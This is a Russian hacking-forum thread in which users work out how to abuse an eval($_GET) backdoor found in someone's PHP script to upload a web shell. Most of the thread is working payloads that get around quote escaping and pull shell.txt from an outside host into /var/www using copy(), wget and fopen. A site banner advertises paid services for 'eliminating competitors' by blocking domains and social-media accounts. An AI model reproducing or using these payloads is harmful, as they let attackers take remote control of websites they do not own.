Помогите воспользоваться уязвимостью

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Помогите воспользоваться уязвимостью

Опции темы

Поиск в этой теме

Опции просмотра

23.09.2010, 21:49

LamerHacker

Новичок

Регистрация: 22.09.2010

Сообщений: 5

С нами: 8230646

Репутация: 0

Есть одна уязвимость, точнее Бэкдор в одном скрипте

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]eval ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'q'[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR]

Хочу залить на сайт шелл, проблема в том, что кавычки в параметрах $_GET экранизируется, поэтому ничего не выходит

𝕏 Twitter Reddit Telegram Копировать ссылку

23.09.2010, 22:14

LamerHacker

Новичок

Регистрация: 22.09.2010

Сообщений: 5

С нами: 8230646

Репутация: 0

Пока ждал ответа мысль сама пришла в голову

Если кому интересно, то вот мой вариант

index.php?q=$_GET[q2]=stripslashes($_GET[q2]);eval($_GET[q2]);&q2=copy("http://site.ru/shell.txt","shell.php");

24.09.2010, 08:23

Redwood

Участник форума

Регистрация: 10.09.2009

Сообщений: 120

С нами: 8772211

Репутация: 56

Код:

или

Код:

cmd=copy('http://site.ru/shell.txt','/var/www/shell.php');

Без stripslashes

Код:

cmd=copy($_REQUEST[a],$_REQUEST[b]);&a=http://site.ru/shell.txt&b=/var/www/shell.php

Через wget, curl, fetch и другие качалки

Код:

cmd=wget http://site.ru/shell.txt -O /var/www/shell.php

Ну, а если, все таки, очень хочется по извращаться

Код:

eval($_REQUEST[cmd]);

Код:

cmd=$a=fopen($_REQUEST[b],$_REQUEST[bb]);$b=fopen($_REQUEST[c],$_REQUEST[cc]);while(!feof($a)){$res=fgets($a);fputs($b,$res);}&bb=b&cc=w+&b=http://site.ru/shell.txt&c=/var/www/shell.php